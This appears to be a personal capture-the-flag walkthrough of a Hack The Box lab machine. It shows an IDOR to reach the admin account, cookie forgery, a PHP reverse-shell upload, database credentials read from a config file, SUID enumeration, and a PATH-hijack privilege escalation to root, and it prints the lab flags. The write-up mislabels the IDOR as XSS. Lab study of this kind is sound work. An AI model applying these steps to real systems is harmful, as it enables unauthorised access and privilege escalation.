//from source code we see a login script:
<script src="/cdn-cgi/login/script.js"></script>

//now on login page http://10.129.148.64/cdn-cgi/login/
2233	guest	guest@megacorp.com

//accounts
2	client	client@client.htb


//we notice the url is modifiable (xss)
//changing id from 2 to 1 show us admin account
http://10.129.148.64/cdn-cgi/login/admin.php?content=accounts&id=1

34322	admin	admin@megacorp.com

//we modify our cookie to login as admin with its id and access uploads page
//now lets upload a php shell and catch a netcat connection

//we get access as www-data

//exploring web folders we find db.php
www-data@oopsie:/var/www/html/cdn-cgi$ cd login
cd login
www-data@oopsie:/var/www/html/cdn-cgi/login$ ls
ls
admin.php  db.php  index.php  script.js
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
cat db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>



$ cd home
$ ls
robert
$ cd robert
$ ls
user.txt
$ cat user.txt

//first flag
f2c74ee8db7983851ab2a96a44eb7981




//Time to privEsc
first we need a TTY
python3 -c 'import pty;pty.spawn("/bin/bash")'

//now we check sudo
sudo -l not useful we need password

//time to check SUID and SGID

//SUID
find / -perm /4000 2>/dev/null

/snap/core/11420/bin/mount
/snap/core/11420/bin/ping
/snap/core/11420/bin/ping6
/snap/core/11420/bin/su
/snap/core/11420/bin/umount
/snap/core/11420/usr/bin/chfn
/snap/core/11420/usr/bin/chsh
/snap/core/11420/usr/bin/gpasswd
/snap/core/11420/usr/bin/newgrp
/snap/core/11420/usr/bin/passwd
/snap/core/11420/usr/bin/sudo
/snap/core/11420/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/11420/usr/lib/openssh/ssh-keysign
/snap/core/11420/usr/lib/snapd/snap-confine
/snap/core/11420/usr/sbin/pppd
/snap/core/11743/bin/mount
/snap/core/11743/bin/ping
/snap/core/11743/bin/ping6
/snap/core/11743/bin/su
/snap/core/11743/bin/umount
/snap/core/11743/usr/bin/chfn
/snap/core/11743/usr/bin/chsh
/snap/core/11743/usr/bin/gpasswd
/snap/core/11743/usr/bin/newgrp
/snap/core/11743/usr/bin/passwd
/snap/core/11743/usr/bin/sudo
/snap/core/11743/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/11743/usr/lib/openssh/ssh-keysign
/snap/core/11743/usr/lib/snapd/snap-confine
/snap/core/11743/usr/sbin/pppd
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping
/bin/su
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/newuidmap
/usr/bin/passwd
/usr/bin/at
/usr/bin/bugtracker
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/sudo

//SGID
find / -perm /2000 2>/dev/null
/snap/core/11420/etc/chatscripts
/snap/core/11420/etc/ppp/peers
/snap/core/11420/sbin/pam_extrausers_chkpwd
/snap/core/11420/sbin/unix_chkpwd
/snap/core/11420/usr/bin/chage
/snap/core/11420/usr/bin/crontab
/snap/core/11420/usr/bin/dotlockfile
/snap/core/11420/usr/bin/expiry
/snap/core/11420/usr/bin/mail-lock
/snap/core/11420/usr/bin/mail-touchlock
/snap/core/11420/usr/bin/mail-unlock
/snap/core/11420/usr/bin/ssh-agent
/snap/core/11420/usr/bin/wall
/snap/core/11420/usr/local/lib/python3.5
/snap/core/11420/usr/local/lib/python3.5/dist-packages
/snap/core/11420/var/local
/snap/core/11420/var/mail
/snap/core/11743/etc/chatscripts
/snap/core/11743/etc/ppp/peers
/snap/core/11743/sbin/pam_extrausers_chkpwd
/snap/core/11743/sbin/unix_chkpwd
/snap/core/11743/usr/bin/chage
/snap/core/11743/usr/bin/crontab
/snap/core/11743/usr/bin/dotlockfile
/snap/core/11743/usr/bin/expiry
/snap/core/11743/usr/bin/mail-lock
/snap/core/11743/usr/bin/mail-touchlock
/snap/core/11743/usr/bin/mail-unlock
/snap/core/11743/usr/bin/ssh-agent
/snap/core/11743/usr/bin/wall
/snap/core/11743/usr/local/lib/python3.5
/snap/core/11743/usr/local/lib/python3.5/dist-packages
/snap/core/11743/var/local
/snap/core/11743/var/mail
/var/log/journal
/var/log/journal/30ac2a931f55413aac392af212029ea4
/var/mail
/var/local
/sbin/unix_chkpwd
/sbin/pam_extrausers_chkpwd
/usr/local/share/fonts
/usr/local/lib/python3.6
/usr/local/lib/python3.6/dist-packages
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/utempter/utempter
/usr/bin/bsd-write
/usr/bin/chage
/usr/bin/expiry
/usr/bin/wall
/usr/bin/mlocate
/usr/bin/at
/usr/bin/crontab
/usr/bin/ssh-agent

//value 6000 for both

//bugtracker in SUID
//bugtracker
www-data@oopsie:/var/www/html/cdn-cgi/login$ find / -group bugtracker 2>/dev/null
<cdn-cgi/login$ find / -group bugtracker 2>/dev/null
/usr/bin/bugtracker

//switched to robert user with the password found in db.php
www-data@oopsie:/var/www/html/cdn-cgi/login$ su robert
su robert
Password: M3g4C0rpUs3r!


//on running bugtracker we notice its try to execute tis command
"cat /root/reports/BUG_ID"

//we could modify that to get root access

we get good informations about filezila usage with BUG_ID from 1 to 3

//lets modify system acces to "cat" command
//I choose tmp (fav folder)

export PATH=/tmp:$PATH
robert@oopsie:/$ cd /tmp
cd /tmp
robert@oopsie:/tmp$ echo '/bin/sh' > cat
echo '/bin/sh' > cat
robert@oopsie:/tmp$ chmod +X cat
chmod +x cat

//basically we got root now
# rm cat
rm cat
# cd /root
cd /root
# cat root.txt
cat root.txt
af13b0bee69f8a877c3faf667f7beacf

//done.
